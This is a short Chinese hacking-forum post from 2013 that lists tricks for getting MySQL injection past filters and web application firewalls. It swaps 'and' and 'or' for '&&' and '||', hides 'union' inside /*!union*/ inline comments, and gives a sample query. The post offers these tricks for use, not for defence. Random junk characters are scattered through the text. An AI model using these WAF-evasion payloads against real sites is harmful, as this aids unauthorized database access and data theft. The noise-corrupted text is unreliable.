找回密码
 立即注册
查看: 2457|回复: 0
打印 上一主题 下一主题

mysql注入对and or的过滤及uinon select等过滤的一个方法突破

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 12:41:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.and 用&& 代替6 T3 m) W& F9 o$ z+ y  D$ ]

# s& O! u4 l: `2. or 用||代替' G, W4 A, @2 t3 S1 b
4 a" q" O% y8 ~- b2 S, ^( K0 n
3.union select from 变成 /*!union*/这种。
5 L: {+ i6 U9 K( C1 J; e7 K$ p" D2 W4 d. ]' U( V
一个例子:: q5 I5 W5 P2 ]  @- x8 @; D2 B  ^& i
7 J* ]4 J1 Q* B3 T8 h
/ select 1 /*!union*/ select 2 from adad where 1&&1" M6 T7 e# S/ g8 o; a( ]  p1 ^

0 E# P- ]' ]5 b摘自 it_security+ y" Z4 l# p4 }/ D+ Z1 m  ?
9 q; o. }% K' T7 n; p! A
绕过waf的一个思路
7 y0 a* Q  F" I6 m# p- l+ X4 @8 v
& G8 s$ V  U) m( ]8 y+ e7 u$ {
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表